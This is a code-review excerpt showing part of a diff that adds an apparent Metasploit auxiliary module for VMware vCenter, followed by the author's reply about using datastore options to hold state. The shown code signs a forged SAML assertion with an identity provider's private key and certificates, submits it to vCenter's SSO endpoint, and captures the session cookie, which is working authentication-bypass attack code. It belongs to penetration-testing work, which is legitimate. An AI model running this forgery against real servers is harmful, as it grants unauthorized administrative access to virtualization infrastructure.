modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb

```diff
@@ -0,0 +1,580 @@
+    ds_ref_element.add_element('ds:DigestValue').text = digest_b64
+
+    noko_sig_element = Nokogiri::XML(ds_element.to_s) do |config|
+      config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
+    end
+
+    noko_signed_info_element = noko_sig_element.at_xpath('//ds:Signature/ds:SignedInfo', NS_MAP)
+    c14n_string = noko_signed_info_element.canonicalize(Nokogiri::XML::XML_C14N_EXCLUSIVE_1_0)
+
+    signature = Base64.strict_encode64(saml_idp_key.sign('rsa-sha256', c14n_string))
+    ds_element.add_element('ds:SignatureValue').text = signature
+
+    key_info_element = ds_element.add_element('ds:KeyInfo')
+
+    x509_element = key_info_element.add_element('ds:X509Data')
+    x509_cert_element = x509_element.add_element('ds:X509Certificate')
+    x509_cert_element.text = Base64.strict_encode64(saml_idp_cert.to_der)
+
+    x509_element = key_info_element.add_element('ds:X509Data')
+    x509_cert_element = x509_element.add_element('ds:X509Certificate')
+    x509_cert_element.text = Base64.strict_encode64(saml_ca_cert.to_der)
+
+    noko_signed_signature_element = Nokogiri::XML(ds_element.to_s) do |config|
+      config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
+    end
+
+    xmldoc.at_xpath('//saml2:Assertion/saml2:Issuer', NS_MAP).add_next_sibling(noko_signed_signature_element.document.root.to_s)
+
+    signed_assertion = xmldoc.document.to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<')
+    return signed_assertion
+  end
+
+  def submit_vcenter_auth(xml)
+    saml_response = Base64.strict_encode64(xml)
+
+    if saml_relay_state
+      res = send_request_cgi({
+        'uri' => '/ui/saml/websso/sso',
+        'method' => 'POST',
+        'vars_post' => {
+          'SAMLResponse' => saml_response,
+          'RelayState' => saml_relay_state
+        }
+      })
+    else
+      res = send_request_cgi({
+        'uri' => '/ui/saml/websso/sso',
+        'method' => 'POST',
+        'vars_post' => {
+          'SAMLResponse' => saml_response
+        }
+      })
+    end
+
+    unless res
+      print_error("#{rhosts} - could not reach SAML endpoint")
+      return false
+    end
+
+    unless res.code == 302
+      print_error("#{rhosts} - expected HTTP 302, got HTTP #{res.code}")
+      if res.body.to_s != ''
+        res_detail = extract_response_code(res.body.to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<'))
+        unless res_detail
+          print_error("Unable to interpret response from vCenter. Raw response:\n#{res}")
+          return false
+        end
+        print_error("Response: #{res_detail}")
+        return false
+      end
+    end
+
+    datastore['VCENTER_SAML_TOKEN'] = res.get_cookies_parsed.values.select { |v| v.to_s.include?('JSESSIONID') }.first.first
+    datastore['VCENTER_SAML_PATH'] = res.get_cookies_parsed.values.select { |v| v.to_s.include?('Path') }.first.first
```

Comment:
This is again largely because I'm green. Early on for some reason I concluded that you NEEDED to use a datastore option to persist a variable state across the entire module, and even when I learned better it never occurred to me to stop doing that. Will def. make this proper.